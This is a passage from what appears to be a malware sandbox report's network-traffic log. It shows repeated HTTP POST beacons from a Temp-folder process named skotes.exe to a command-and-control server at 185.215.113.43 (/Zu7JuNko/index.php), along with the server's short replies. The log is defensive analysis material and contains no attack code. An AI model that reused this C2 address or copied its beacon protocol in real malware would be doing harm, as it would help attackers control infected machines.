                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:44.238205910 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:44 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      91192.168.2.652458185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:45.865127087 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:46.565373898 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      92192.168.2.652459185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:48.082751036 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:48.809009075 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:48 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      93192.168.2.652460185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:50.440624952 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:51.150722980 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      94192.168.2.652462185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:52.677586079 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:53.372946024 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      95192.168.2.652463185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:55.014281034 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:55.706526041 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:55 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      96192.168.2.652464185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:57.233748913 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:57.936923027 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:57:57 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      97192.168.2.652465185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:59.560966015 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:00.255740881 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      98192.168.2.652466185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:01.776496887 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:02.481606007 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      99192.168.2.652467185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:04.113527060 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:04.872773886 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:04 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      100192.168.2.652468185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:06.387012959 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:07.091418982 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      101192.168.2.652469185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:08.721100092 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:09.426070929 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      102192.168.2.652470185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:10.940855980 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:11.652585030 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:11 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      103192.168.2.652471185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:13.290728092 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      104192.168.2.652472185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:14.820169926 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:15.519784927 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      105192.168.2.652473185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:17.174313068 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:58:17.879460096 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:58:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      106192.168.2.652474185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
